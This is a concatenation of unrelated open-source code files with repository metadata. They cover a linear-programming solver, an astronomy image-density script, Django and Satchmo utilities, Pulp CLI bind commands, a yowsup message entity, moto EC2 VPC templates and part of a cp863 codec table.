_, pivots = sympy.Matrix(A).T.rref()
A = A[list(pivots)]
print('Shape of A after dropping redundant rows is {}'.format(A.shape))
m = A.shape[0]
n = A.shape[1]
x = np.ones(shape=(n, ))
l = np.ones(shape=(m, ))
s = np.ones(shape=(n, ))
k = 0
while abs(np.dot(x, s)) > epsilon:
k += 1
primal_obj = np.dot(c, x)
dual_obj = np.dot(b, l)
print('iteration #{}; primal_obj = {:.5f}, dual_obj = {:.5f}; duality_gap = {:.5f}'.format
(k, primal_obj, dual_obj, primal_obj - dual_obj))
sigma_k = 0.4
mu_k = np.dot(x, s) / n
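# Assemble the Newton system for the perturbed KKT conditions, with
# X = diag(x), S = diag(s) and e a vector of ones:
#   [ A    0    0 ] [dx]   [ b - A x                    ]
#   [ 0   A^T   I ] [dl] = [ c - A^T l - s              ]
#   [ S    0    X ] [ds]   [ sigma_k * mu_k * e - X S e ]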
A_ = np.zeros(shape=(m + n + n, n + m + n))
A_[0:m, 0:n] = np.copy(A)
A_[m:m + n, n:n + m] = np.copy(A.T)
A_[m:m + n, n + m:n + m + n] = np.eye(n)
A_[m + n:m + n + n, 0:n] = np.copy(np.diag(s))
A_[m + n:m + n + n, n + m:n + m + n] = np.copy(np.diag(x))
b_ = np.zeros(shape=(n + m + n, ))
b_[0:m] = np.copy(b - np.dot(A, x))
b_[m:m + n] = np.copy(c - np.dot(A.T, l) - s)
tmp = np.dot(np.dot(np.diag(x), np.diag(s)), np.ones(shape=(n, )))
b_[m + n:m + n + n] = np.copy( sigma_k * mu_k * np.ones(shape=(n, )) - tmp )
delta = np.linalg.solve(A_, b_)
delta_x = delta[0:n]
delta_l = delta[n:n + m]
delta_s = delta[n + m:n + m + n]
alpha_max = 1.0
for i in range(n):
if delta_x[i] < 0:
alpha_max = min(alpha_max, -x[i]/delta_x[i])
if delta_s[i] < 0:
alpha_max = min(alpha_max, -s[i]/delta_s[i])
eta_k = 0.99
alpha_k = min(1.0, eta_k * alpha_max)
x = x + alpha_k * delta_x
l = l + alpha_k * delta_l
s = s + alpha_k * delta_s
diff = np.dot(A, x) - b
print('Ax - b = {}; ideally it should have been zero vector'.format(diff))
print('norm of Ax - b is = {}; ideally it should have been zero'.format
(np.linalg.norm(diff)))
return x
A = np.array([[1, 1, 1, 0],
[1, 3, 0, 1]])
b = np.array([5,7])
c = np.array([-1, -5, 0, 0 ])
res = solve(c,A,b)
print (res)
res = linprog(c, A_eq=A, b_eq=b, options={"disp": True})
print (res)
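# Hand-checked optimum for this small LP (assuming both solvers converge):
# maximizing x1 + 5*x2 subject to x1 + x2 <= 5 and x1 + 3*x2 <= 7 is attained
# at (x1, x2) = (0, 7/3), so x ~ (0, 2.3333, 2.6667, 0) with objective
# c.x = -35/3 ~ -11.6667 reported by both the solver above and linprog.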
| gpl-3.0 |
Kivvix/stage-LPC | trackSrc/density.py | 1 | 4448 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
## @package density
# @author J. Massot
# @date 2014-04-30
#
# @brief Calculate the density of pictures in Stripe 82
#
# @details Read the coordinates of each `fits` file and count the density of images per sky bin
from numpy import *
import math
# to manipulate fits files
import pyfits
import csv
import glob
## @def RA_BEG RA_END
# @brief begin and end of field in RA
RA_BEG = 5.0
RA_END = 7.5
DEC_BEG = -1.2
DEC_END = 1.2
## @def RA_N DEC_N
# @brief number of division in RA and Dec
RA_N = 1000
DEC_N = 100
## @def RA_A RA_B
# @brief coefficients of the equation y = RA_A*x + RA_B used to convert coordinates into matrix indices (x: coordinate, y: index)
RA_A = (RA_N)/(RA_END - RA_BEG)
RA_B = -1.0*RA_A*RA_BEG
DEC_A = (DEC_N)/(DEC_END - DEC_BEG)
DEC_B = -1.0*DEC_A*DEC_BEG
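# Worked example of the mapping: RA_A = 1000 / (7.5 - 5.0) = 400 and
# RA_B = -400 * 5.0 = -2000, so a source at RA = 6.0 deg lands in
# RA bin floor(400 * 6.0 - 2000) = 400; the Dec axis works the same way.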
## @def fname
# @brief name of output file
fname = "density.csv"
## @fn foncfg
# @brief generic implementation of f(u,v) and g(u,v)
#
# @param L letter of the matrix name (A or B)
# @param img object containing all data on the image of the current calexp
# @param u intermediate variable used to compute `SKY1_CRVAL1` and `SKY2_CRVAL2`
# @param v same as u
#
# @return r value of $f(u,v)$ or $g(u,v)$ according to the value of L
def foncfg(L,img,u,v):
r = 0
for p in range( 0 , img[L+"_ORDER"] ):
for q in range( 0 , img[L+"_ORDER"]-p ):
try:
# guard: fall back to 0 when the L_p_q coefficient is absent from the header
a = img[L+"_"+str(p)+"_"+str(q)]
except:
a = 0.0
r += a * (u**p) * (v**q)
return r
## @fn f
# @brief see function `#foncfg` for more information
#
# @return f(u,v)
def f(img,u,v):
return foncfg('A',img,u,v)
## @fn g
# @brief see function `#foncfg` for more information
# @return g(u,v)
def g(img,u,v):
return foncfg('B',img,u,v)
## @fn X
# @brief Compute the vector of `SKY1_CRVAL1` and `SKY2_CRVAL2` values
#
# @param img object containing all data on the image of the current calexp
# @param u intermediate variable used to compute `SKY1_CRVAL1` and `SKY2_CRVAL2`
# @param v same as u
#
# @return X matrix (one column) with the coordinates `SKY1_CRVAL1` and `SKY2_CRVAL2`
def X(img,u,v,CD):
fuv = f(img,u,v)
guv = g(img,u,v)
Y = matrix(str(u+fuv) + " ; " + str(v+guv))
X = CD*Y
X = X + matrix( str(img["CRVAL1"]) + " ; " + str(img["CRVAL2"]) )
return X
## @fn CD
# @brief matrix to calculate `SKY1_CRVAL1` and `SKY2_CRVAL2`
#
# @param img object containing all data on the image of the current `calexp`
#
# @return CD matrix to calculate `SKY1_CRVAL1` and `SKY2_CRVAL2`
def CD(img):
return matrix( str(img["CD1_1"]) + " " + str(img["CD1_2"]) + " ; " + \
str(img["CD2_1"]) + " " + str(img["CD2_2"]) )
## @fn coord
# @brief compute extreme coordinates of current `calexp`
#
# @param fits name of fits file
#
# @return coordMin matrix with the coordinates of the image at pixel (0,0)
def coord(fits):
# open fits file
hdulist = pyfits.open(fits)
## @def img
# @brief img object containing all data on the image of the current calexp
img = hdulist[1].header
CDmat = CD(img)
hdulist.close()
# compute SKY1_CRVAL1 and SKY2_CRVAL2 in pixel (0,0)
coordMin = X(img,img["CRPIX1"],img["CRPIX2"],CDmat)
return coordMin
def addZone(fits):
global RA_A , RA_B
global DEC_A , DEC_B
global RA_N , DEC_N
global mat
coordMin = coord(fits)
numFits = fits.split('/')[-1][7:21]
#print " ( " + str(coordMin[0]) + " ; " + str(coordMin[1]) + " )"
for i in range( int(math.floor(RA_A * coordMin[0] + RA_B)) , int(math.floor(RA_A * (coordMin[0]+0.2) + RA_B)) ):
if i > 0 and i < RA_N:
for j in range( int(DEC_A * coordMin[1] + DEC_B) , int(DEC_A * (coordMin[1]+0.2) + DEC_B) ):
if j > 0 and j < DEC_N:
try:
mat[(i,j)][1].append(numFits)
mat[(i,j)] = ( mat[(i,j)][0]+1 , mat[(i,j)][1] )
except:
mat[(i,j)] = ( 1 , [fits.split('/')[-1][7:21],] )
mat = {}
listFits = glob.glob("/sps/lsst/data/dev/lsstprod/DC_2013_one_percent/calexp_dir/sci-results/*/*/u/calexp/calexp-*.fits")
#listFits = glob.glob("/home/massot/Projet/compareSrc/data/calexp/calexp-*.fits")
nFits = len(listFits)
n = 1
print "début de la récupération des données : "
for fits in listFits:
print "\r"+str(n) + " / " + str(nFits),
n += 1
# for each calexp fits file
addZone(fits)
print "\nfin de la récupération des données"
f = open(fname, "wb")
writer = csv.writer(f)
writer.writerow( ('i', 'j', 'density' , 'rrrrrr-cv-ffff') )
for i,j in mat:
writer.writerow( (i,j,mat[i,j][0],mat[i,j][1]) )
| mit |
grengojbo/satchmo | satchmo/apps/satchmo_utils/unique_id.py | 12 | 3376 | """
Create a unique user id given a first and last name.
First, we try simple concatenation of first and last name.
If that doesn't work, we add random numbers to the name
"""
from django.contrib.auth.models import User
from django.utils.encoding import smart_unicode
from htmlentitydefs import name2codepoint
from satchmo_utils import random_string
import re
import unicodedata
_is_alnum_re = re.compile(r'\w+')
_ID_MIN_LENGTH = 5 # minimum reasonable length for username
_ID_MAX_LENGTH = 30 # as defined in django.auth.contrib.models.User.username field
def _id_generator(first_name, last_name, email):
def _alnum(s, glue=''):
return glue.join(filter(len, _is_alnum_re.findall(s))).lower()
# The way to generate id is by trying:
# 1. username part of email
# 2. ascii-transliterated first+last name
# 3. whole email with non-alphanumerics replaced by underscore
# 4. random string
# Every try must return at least _ID_MIN_LENGTH chars to succeed and is truncated
# to _ID_MAX_LENGTH. All IDs are lowercased.
id = _alnum(email.split('@')[0])
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
id = _alnum(unicodedata.normalize('NFKD', first_name + last_name).encode('ascii', 'ignore'))
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
id = _alnum(email, glue='_')
if len(id) >= _ID_MIN_LENGTH:
yield id[:_ID_MAX_LENGTH]
while True:
yield _alnum('%s_%s' % (id[:_ID_MIN_LENGTH], random_string(_ID_MIN_LENGTH, True)))[:_ID_MAX_LENGTH]
def generate_id(first_name='', last_name='', email=''):
valid_id = False
gen = _id_generator(first_name, last_name, email)
test_name = gen.next()
while valid_id is False:
try:
User.objects.get(username=test_name)
except User.DoesNotExist:
valid_id = True
else:
test_name = gen.next()
return test_name
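# Illustrative run, assuming neither candidate username is taken yet:
#   generate_id('John', 'Doe', 'jdoe@example.com') -> 'johndoe'
# ('jdoe' is rejected first because it is shorter than _ID_MIN_LENGTH).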
# From http://www.djangosnippets.org/snippets/369/
def slugify(s, entities=True, decimal=True, hexadecimal=True,
instance=None, slug_field='slug', filter_dict=None):
s = smart_unicode(s)
#character entity reference
if entities:
s = re.sub('&(%s);' % '|'.join(name2codepoint), lambda m: unichr(name2codepoint[m.group(1)]), s)
#decimal character reference
if decimal:
try:
s = re.sub('&#(\d+);', lambda m: unichr(int(m.group(1))), s)
except:
pass
#hexadecimal character reference
if hexadecimal:
try:
s = re.sub('&#x([\da-fA-F]+);', lambda m: unichr(int(m.group(1), 16)), s)
except:
pass
#translate
s = unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')
#replace unwanted characters
#Added _ because this is a valid slug option
s = re.sub(r'[^-a-z0-9_]+', '-', s.lower())
#remove redundant -
s = re.sub('-{2,}', '-', s).strip('-')
slug = s
if instance:
def get_query():
query = instance.__class__.objects.filter(**{slug_field: slug})
if filter_dict:
query = query.filter(**filter_dict)
if instance.pk:
query = query.exclude(pk=instance.pk)
return query
counter = 1
while get_query():
slug = "%s-%s" % (s, counter)
counter += 1
return slug
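# Worked example: slugify(u'H\xe9llo, W\xf6rld!') -> 'hello-world'
# (NFKD strips the accents, runs of punctuation collapse to single
# hyphens, and leading/trailing hyphens are stripped).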
| bsd-3-clause |
Work4Labs/lettuce | tests/integration/lib/Django-1.3/django/utils/itercompat.py | 294 | 1169 | """
Providing iterator functions that are not in all version of Python we support.
Where possible, we try to use the system-native version and only fall back to
these implementations if necessary.
"""
import itertools
# Fallback for Python 2.4, Python 2.5
def product(*args, **kwds):
"""
Taken from http://docs.python.org/library/itertools.html#itertools.product
"""
# product('ABCD', 'xy') --> Ax Ay Bx By Cx Cy Dx Dy
# product(range(2), repeat=3) --> 000 001 010 011 100 101 110 111
pools = map(tuple, args) * kwds.get('repeat', 1)
result = [[]]
for pool in pools:
result = [x+[y] for x in result for y in pool]
for prod in result:
yield tuple(prod)
if hasattr(itertools, 'product'):
product = itertools.product
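# Example, identical for the fallback and the native implementation:
#   list(product('AB', repeat=2)) == [('A','A'), ('A','B'), ('B','A'), ('B','B')]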
def is_iterable(x):
"A implementation independent way of checking for iterables"
try:
iter(x)
except TypeError:
return False
else:
return True
def all(iterable):
for item in iterable:
if not item:
return False
return True
def any(iterable):
for item in iterable:
if item:
return True
return False
| gpl-3.0 |
jeremycline/pulp | client_lib/pulp/client/commands/consumer/bind.py | 17 | 8165 | from gettext import gettext as _
from pulp.client.commands.options import DESC_ID, OPTION_CONSUMER_ID, OPTION_REPO_ID
from pulp.client.commands.polling import PollingCommand
from pulp.client.consumer_utils import load_consumer_id
from pulp.client.extensions.extensions import PulpCliFlag, PulpCliOption
from pulp.common import tags
OPTION_DISTRIBUTOR_ID = PulpCliOption('--distributor-id', DESC_ID, required=True)
FLAG_FORCE = PulpCliFlag('--force',
_('delete the binding immediately without tracking the progress'))
class BindRelatedPollingCommand(PollingCommand):
"""
Unfortunately, the Pulp server will report bind/unbind tasks as successful even though they
failed. Due to this, we must override the PollingCommand's succeeded() and failed() methods.
This is a superclass for ConsumerBindCommand and ConsumerUnbindCommand so we can solve this
issue in one place.
"""
def succeeded(self, task):
"""
The server will lie to us and tell us that the bind/unbind task succeeded when it did not.
We must inspect the task's progress report to find out what really happened. If it
succeeded, call the superclass method. If not, call self.failed().
:param task: The task to inspect for success or failure
:type task: pulp.bindings.responses.Task
"""
if task.result['succeeded']:
super(BindRelatedPollingCommand, self).succeeded(task)
else:
self.failed(task)
def failed(self, task):
"""
The server does not put error messages in the standard locations for Pulp Tasks, so we need
a custom failure message renderer. This method prints the error message.
:param task: The task to inspect for success or failure
:type task: pulp.bindings.responses.Task
"""
super(BindRelatedPollingCommand, self).failed(task)
msg = _("Please see the Pulp server logs for details.")
self.context.prompt.render_failure_message(msg, tag='error_message')
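# Subclasses below reuse this polling plumbing: poll() drives task_header(),
# succeeded() and failed(), so a concrete command only has to supply option
# wiring and the per-action header rendering.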
class ConsumerBindCommand(BindRelatedPollingCommand):
"""
Base class that binds a consumer to a repository and an arbitrary
distributor.
"""
def __init__(self, context, name=None, description=None):
name = name or 'bind'
description = description or _('binds a consumer to a repository')
PollingCommand.__init__(self, name, description, self.run, context)
self.add_option(OPTION_REPO_ID)
self.add_consumer_option()
self.add_distributor_option()
def add_consumer_option(self):
"""
Override this method to a no-op to skip adding the consumer id option.
This allows commands (such as the consumer command) to find the consumer
id via other means than a command line option.
"""
self.add_option(OPTION_CONSUMER_ID)
def add_distributor_option(self):
"""
Override this method to a no-op to skip adding the distributor options.
This allows derived commands to specialize (read: hard-code) the
distributor types they work with.
"""
self.add_option(OPTION_DISTRIBUTOR_ID)
def run(self, **kwargs):
consumer_id = self.get_consumer_id(kwargs)
repo_id = kwargs[OPTION_REPO_ID.keyword]
distributor_id = self.get_distributor_id(kwargs)
response = self.context.server.bind.bind(consumer_id, repo_id, distributor_id)
tasks = response.response_body # already a list for bind
self.poll(tasks, kwargs)
def get_consumer_id(self, kwargs):
"""
Override this method to provide the consumer id to the run method.
"""
return kwargs.get(OPTION_CONSUMER_ID.keyword, load_consumer_id(self.context))
def get_distributor_id(self, kwargs):
"""
Override this method to provide the distributor id to the run method.
"""
return kwargs[OPTION_DISTRIBUTOR_ID.keyword]
def task_header(self, task):
handlers = {
tags.action_tag(tags.ACTION_BIND): self._render_bind_header,
tags.action_tag(tags.ACTION_AGENT_BIND): self._render_agent_bind_header,
}
# There will be exactly 1 action tag for each task (multiple resource tags)
action_tags = [t for t in task.tags if tags.is_action_tag(t)]
action_tag = action_tags[0]
handler = handlers[action_tag]
handler()
def _render_bind_header(self):
"""
Displays the task header for the bind task.
"""
self.prompt.write(_('-- Updating Pulp Server --'), tag='bind-header')
def _render_agent_bind_header(self):
"""
Displays the task header for the agent's bind task.
"""
self.prompt.write(_('-- Notifying the Consumer --'), tag='agent-bind-header')
class ConsumerUnbindCommand(BindRelatedPollingCommand):
"""
Base class that unbinds a consumer from a repository and an arbitrary
distributor.
"""
def __init__(self, context, name=None, description=None):
name = name or 'unbind'
description = description or _('removes the binding between a consumer and a repository')
PollingCommand.__init__(self, name, description, self.run, context)
self.add_option(OPTION_REPO_ID)
self.add_consumer_option()
self.add_distributor_option()
self.add_flag(FLAG_FORCE)
def add_consumer_option(self):
"""
Override this method to a no-op to skip adding the consumer id option.
This allows commands (such as the consumer command) to find the consumer
id via other means than a command line option.
"""
self.add_option(OPTION_CONSUMER_ID)
def add_distributor_option(self):
"""
Override this method to a no-op to skip adding the distributor options.
This allows derived commands to specialize (read: hard-code) the
distributor types they work with.
"""
self.add_option(OPTION_DISTRIBUTOR_ID)
def run(self, **kwargs):
consumer_id = self.get_consumer_id(kwargs)
repo_id = kwargs[OPTION_REPO_ID.keyword]
distributor_id = self.get_distributor_id(kwargs)
force = kwargs[FLAG_FORCE.keyword]
response = self.context.server.bind.unbind(consumer_id, repo_id, distributor_id, force)
tasks = response.response_body # already a list of tasks from the server
self.poll(tasks, kwargs)
def get_consumer_id(self, kwargs):
"""
Override this method to provide the consumer id to the run method.
"""
return kwargs.get(OPTION_CONSUMER_ID.keyword, load_consumer_id(self.context))
def get_distributor_id(self, kwargs):
"""
Override this method to provide the distributor id to the run method.
"""
return kwargs[OPTION_DISTRIBUTOR_ID.keyword]
def task_header(self, task):
handlers = {
tags.action_tag(tags.ACTION_UNBIND): self._render_unbind_header,
tags.action_tag(tags.ACTION_AGENT_UNBIND): self._render_agent_unbind_header,
tags.action_tag(tags.ACTION_DELETE_BINDING): self._render_delete_binding_header,
}
# There will be exactly 1 action tag for each task (multiple resource tags)
action_tags = [t for t in task.tags if tags.is_action_tag(t)]
action_tag = action_tags[0]
handler = handlers[action_tag]
handler()
def _render_unbind_header(self):
"""
Displays the task header for the unbind task.
"""
self.prompt.write(_('-- Updating Pulp Server --'), tag='unbind-header')
def _render_agent_unbind_header(self):
"""
Displays the task header for the agent's unbind task.
"""
self.prompt.write(_('-- Notifying the Consumer --'), tag='agent-unbind-header')
def _render_delete_binding_header(self):
"""
Displays the task header for the second update to the server's database.
"""
self.prompt.write(_('-- Pulp Server Clean Up --'), tag='delete-header')
| gpl-2.0 |
bassijtsma/chatbot | yowsup/layers/axolotl/protocolentities/message_encrypted.py | 36 | 2412 | from yowsup.layers.protocol_messages.protocolentities import MessageProtocolEntity
from yowsup.structs import ProtocolTreeNode
import sys
class EncryptedMessageProtocolEntity(MessageProtocolEntity):
'''
<message retry="1" from="49xxxxxxxx@s.whatsapp.net" t="1418906418" offline="1" type="text" id="1418906377-1" notify="Tarek Galal">
<enc type="{{type}}" v="{{1 || 2}}">
HEX:33089eb3c90312210510e0196be72fe65913c6a84e75a54f40a3ee290574d6a23f408df990e718da761a210521f1a3f3d5cb87fde19fadf618d3001b64941715efd3e0f36bba48c23b08c82f2242330a21059b0ce2c4720ec79719ba862ee3cda6d6332746d05689af13aabf43ea1c8d747f100018002210d31cd6ebea79e441c4935f72398c772e2ee21447eb675cfa28b99de8d2013000</enc>
</message>
'''
TYPE_PKMSG = "pkmsg"
TYPE_MSG = "msg"
def __init__(self, encType, encVersion, encData, _type, _id = None, _from = None, to = None, notify = None, timestamp = None,
participant = None, offline = None, retry = None ):
super(EncryptedMessageProtocolEntity, self).__init__(_type, _id = _id, _from = _from, to = to, notify = notify,
timestamp = timestamp, participant = participant, offline = offline,
retry = retry)
self.setEncProps(encType, encVersion, encData)
def setEncProps(self, encType, encVersion, encData):
assert encType in (self.TYPE_PKMSG, self.TYPE_MSG), "encType must be 'pkmsg' or 'msg'"
self.encType = encType
self.encVersion = int(encVersion)
self.encData = encData
def getEncType(self):
return self.encType
def getEncData(self):
return self.encData
def getVersion(self):
return self.encVersion
def toProtocolTreeNode(self):
node = super(EncryptedMessageProtocolEntity, self).toProtocolTreeNode()
encNode = ProtocolTreeNode("enc", data = self.encData)
encNode["type"] = self.encType
encNode["v"] = str(self.encVersion)
node.addChild(encNode)
return node
@staticmethod
def fromProtocolTreeNode(node):
entity = MessageProtocolEntity.fromProtocolTreeNode(node)
entity.__class__ = EncryptedMessageProtocolEntity
encNode = node.getChild("enc")
entity.setEncProps(encNode["type"], encNode["v"],
encNode.data.encode('latin-1') if sys.version_info >= (3,0) else encNode.data)
return entity | gpl-3.0 |
behanceops/moto | moto/ec2/responses/vpcs.py | 12 | 2821 | from __future__ import unicode_literals
from moto.core.responses import BaseResponse
from moto.ec2.utils import filters_from_querystring, vpc_ids_from_querystring
class VPCs(BaseResponse):
def create_vpc(self):
cidr_block = self.querystring.get('CidrBlock')[0]
vpc = self.ec2_backend.create_vpc(cidr_block)
template = self.response_template(CREATE_VPC_RESPONSE)
return template.render(vpc=vpc)
def delete_vpc(self):
vpc_id = self.querystring.get('VpcId')[0]
vpc = self.ec2_backend.delete_vpc(vpc_id)
template = self.response_template(DELETE_VPC_RESPONSE)
return template.render(vpc=vpc)
def describe_vpcs(self):
vpc_ids = vpc_ids_from_querystring(self.querystring)
filters = filters_from_querystring(self.querystring)
vpcs = self.ec2_backend.get_all_vpcs(vpc_ids=vpc_ids, filters=filters)
template = self.response_template(DESCRIBE_VPCS_RESPONSE)
return template.render(vpcs=vpcs)
CREATE_VPC_RESPONSE = """
<CreateVpcResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpc>
<vpcId>{{ vpc.id }}</vpcId>
<state>pending</state>
<cidrBlock>{{ vpc.cidr_block }}</cidrBlock>
<dhcpOptionsId>dopt-1a2b3c4d2</dhcpOptionsId>
<instanceTenancy>default</instanceTenancy>
<tagSet>
{% for tag in vpc.get_tags() %}
<item>
<resourceId>{{ tag.resource_id }}</resourceId>
<resourceType>{{ tag.resource_type }}</resourceType>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
</vpc>
</CreateVpcResponse>"""
DESCRIBE_VPCS_RESPONSE = """
<DescribeVpcsResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<vpcSet>
{% for vpc in vpcs %}
<item>
<vpcId>{{ vpc.id }}</vpcId>
<state>{{ vpc.state }}</state>
<cidrBlock>{{ vpc.cidr_block }}</cidrBlock>
<dhcpOptionsId>dopt-7a8b9c2d</dhcpOptionsId>
<instanceTenancy>default</instanceTenancy>
<tagSet>
{% for tag in vpc.get_tags() %}
<item>
<resourceId>{{ tag.resource_id }}</resourceId>
<resourceType>{{ tag.resource_type }}</resourceType>
<key>{{ tag.key }}</key>
<value>{{ tag.value }}</value>
</item>
{% endfor %}
</tagSet>
</item>
{% endfor %}
</vpcSet>
</DescribeVpcsResponse>"""
DELETE_VPC_RESPONSE = """
<DeleteVpcResponse xmlns="http://ec2.amazonaws.com/doc/2012-12-01/">
<requestId>7a62c49f-347e-4fc4-9331-6e8eEXAMPLE</requestId>
<return>true</return>
</DeleteVpcResponse>
"""
| apache-2.0 |
Godiyos/python-for-android | python3-alpha/python3-src/Lib/encodings/cp863.py | 272 | 34252 | """ Python Character Mapping Codec generated from 'VENDORS/MICSFT/PC/CP863.TXT' with gencodec.py.
"""#"
import codecs
### Codec APIs
class Codec(codecs.Codec):
def encode(self,input,errors='strict'):
return codecs.charmap_encode(input,errors,encoding_map)
def decode(self,input,errors='strict'):
return codecs.charmap_decode(input,errors,decoding_table)
class IncrementalEncoder(codecs.IncrementalEncoder):
def encode(self, input, final=False):
return codecs.charmap_encode(input,self.errors,encoding_map)[0]
class IncrementalDecoder(codecs.IncrementalDecoder):
def decode(self, input, final=False):
return codecs.charmap_decode(input,self.errors,decoding_table)[0]
class StreamWriter(Codec,codecs.StreamWriter):
pass
class StreamReader(Codec,codecs.StreamReader):
pass
### encodings module API
def getregentry():
return codecs.CodecInfo(
name='cp863',
encode=Codec().encode,
decode=Codec().decode,
incrementalencoder=IncrementalEncoder,
incrementaldecoder=IncrementalDecoder,
streamreader=StreamReader,
streamwriter=StreamWriter,
)
### Decoding Map
decoding_map = codecs.make_identity_dict(range(256))
decoding_map.update({
0x0080: 0x00c7, # LATIN CAPITAL LETTER C WITH CEDILLA
0x0081: 0x00fc, # LATIN SMALL LETTER U WITH DIAERESIS
0x0082: 0x00e9, # LATIN SMALL LETTER E WITH ACUTE
0x0083: 0x00e2, # LATIN SMALL LETTER A WITH CIRCUMFLEX
0x0084: 0x00c2, # LATIN CAPITAL LETTER A WITH CIRCUMFLEX
0x0085: 0x00e0, # LATIN SMALL LETTER A WITH GRAVE
0x0086: 0x00b6, # PILCROW SIGN
0x0087: 0x00e7, # LATIN SMALL LETTER C WITH CEDILLA
0x0088: 0x00ea, # LATIN SMALL LETTER E WITH CIRCUMFLEX
0x0089: 0x00eb, # LATIN SMALL LETTER E WITH DIAERESIS
0x008a: 0x00e8, # LATIN SMALL LETTER E WITH GRAVE
0x008b: 0x00ef, # LATIN SMALL LETTER I WITH DIAERESIS
0x008c: 0x00ee, # LATIN SMALL LETTER I WITH CIRCUMFLEX
0x008d: 0x2017, # DOUBLE LOW LINE
0x008e: 0x00c0, # LATIN CAPITAL LETTER A WITH GRAVE
0x008f: 0x00a7, # SECTION SIGN
0x0090: 0x00c9, # LATIN CAPITAL LETTER E WITH ACUTE
0x0091: 0x00c8, # LATIN CAPITAL LETTER E WITH GRAVE
0x0092: 0x00ca, # LATIN CAPITAL LETTER E WITH CIRCUMFLEX
0x0093: 0x00f4, # LATIN SMALL LETTER O WITH CIRCUMFLEX
0x0094: 0x00cb, # LATIN CAPITAL LETTER E WITH DIAERESIS
0x0095: 0x00cf, # LATIN CAPITAL LETTER I WITH DIAERESIS
0x0096: 0x00fb, # LATIN SMALL LETTER U WITH CIRCUMFLEX
0x0097: 0x00f9, # LATIN SMALL LETTER U WITH GRAVE
0x0098: 0x00a4, # CURRENCY SIGN
0x0099: 0x00d4, # LATIN CAPITAL LETTER O WITH CIRCUMFLEX
0x009a: 0x00dc, # LATIN CAPITAL LETTER U WITH DIAERESIS
0x009b: 0x00a2, # CENT SIGN
0x009c: 0x00a3, # POUND SIGN
0x009d: 0x00d9, # LATIN CAPITAL LETTER U WITH GRAVE
0x009e: 0x00db, # LATIN CAPITAL LETTER U WITH CIRCUMFLEX
0x009f: 0x0192, # LATIN SMALL LETTER F WITH HOOK
0x00a0: 0x00a6, # BROKEN BAR
0x00a1: 0x00b4, # ACUTE ACCENT
0x00a2: 0x00f3, # LATIN SMALL LETTER O WITH ACUTE
0x00a3: 0x00fa, # LATIN SMALL LETTER U WITH ACUTE
0x00a4: 0x00a8, # DIAERESIS
0x00a5: 0x00b8, # CEDILLA
0x00a6: 0x00b3, # SUPERSCRIPT THREE
0x00a7: 0x00af, # MACRON
0x00a8: 0x00ce, # LATIN CAPITAL LETTER I WITH CIRCUMFLEX
0x00a9: 0x2310, # REVERSED NOT SIGN
0x00aa: 0x00ac, # NOT SIGN
0x00ab: 0x00bd, # VULGAR FRACTION ONE HALF
0x00ac: 0x00bc, # VULGAR FRACTION ONE QUARTER
0x00ad: 0x00be, # VULGAR FRACTION THREE QUARTERS
0x00ae: 0x00ab, # LEFT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00af: 0x00bb, # RIGHT-POINTING DOUBLE ANGLE QUOTATION MARK
0x00b0: 0x2591, # LIGHT SHADE
0x00b1: 0x2592, # MEDIUM SHADE
0x00b2: 0x2593, # DARK SHADE
0x00b3: 0x2502, # BOX DRAWINGS LIGHT VERTICAL
0x00b4: 0x2524, # BOX DRAWINGS LIGHT VERTICAL AND LEFT
0x00b5: 0x2561, # BOX DRAWINGS VERTICAL SINGLE AND LEFT DOUBLE
0x00b6: 0x2562, # BOX DRAWINGS VERTICAL DOUBLE AND LEFT SINGLE
0x00b7: 0x2556, # BOX DRAWINGS DOWN DOUBLE AND LEFT SINGLE
0x00b8: 0x2555, # BOX DRAWINGS DOWN SINGLE AND LEFT DOUBLE
0x00b9: 0x2563, # BOX DRAWINGS DOUBLE VERTICAL AND LEFT
0x00ba: 0x2551, # BOX DRAWINGS DOUBLE VERTICAL
0x00bb: 0x2557, # BOX DRAWINGS DOUBLE DOWN AND LEFT
0x00bc: 0x255d, # BOX DRAWINGS DOUBLE UP AND LEFT
0x00bd: 0x255c, # BOX DRAWINGS UP DOUBLE AND LEFT SINGLE
0x00be: 0x255b, # BOX DRAWINGS UP SINGLE AND LEFT DOUBLE
0x00bf: 0x2510, # BOX DRAWINGS LIGHT DOWN AND LEFT
0x00c0: 0x2514, # BOX DRAWINGS LIGHT UP AND RIGHT
0x00c1: 0x2534, # BOX DRAWINGS LIGHT UP AND HORIZONTAL
0x00c2: 0x252c, # BOX DRAWINGS LIGHT DOWN AND HORIZONTAL
0x00c3: 0x251c, # BOX DRAWINGS LIGHT VERTICAL AND RIGHT
0x00c4: 0x2500, # BOX DRAWINGS LIGHT HORIZONTAL
0x00c5: 0x253c, # BOX DRAWINGS LIGHT VERTICAL AND HORIZONTAL
0x00c6: 0x255e, # BOX DRAWINGS VERTICAL SINGLE AND RIGHT DOUBLE
0x00c7: 0x255f, # BOX DRAWINGS VERTICAL DOUBLE AND RIGHT SINGLE
0x00c8: 0x255a, # BOX DRAWINGS DOUBLE UP AND RIGHT
0x00c9: 0x2554, # BOX DRAWINGS DOUBLE DOWN AND RIGHT
0x00ca: 0x2569, # BOX DRAWINGS DOUBLE UP AND HORIZONTAL
0x00cb: 0x2566, # BOX DRAWINGS DOUBLE DOWN AND HORIZONTAL
0x00cc: 0x2560, # BOX DRAWINGS DOUBLE VERTICAL AND RIGHT
0x00cd: 0x2550, # BOX DRAWINGS DOUBLE HORIZONTAL
0x00ce: 0x256c, # BOX DRAWINGS DOUBLE VERTICAL AND HORIZONTAL
0x00cf: 0x2567, # BOX DRAWINGS UP SINGLE AND HORIZONTAL DOUBLE
0x00d0: 0x2568, # BOX DRAWINGS UP DOUBLE AND HORIZONTAL SINGLE
0x00d1: 0x2564, # BOX DRAWINGS DOWN SINGLE AND HORIZONTAL DOUBLE
0x00d2: 0x2565, # BOX DRAWINGS DOWN DOUBLE AND HORIZONTAL SINGLE
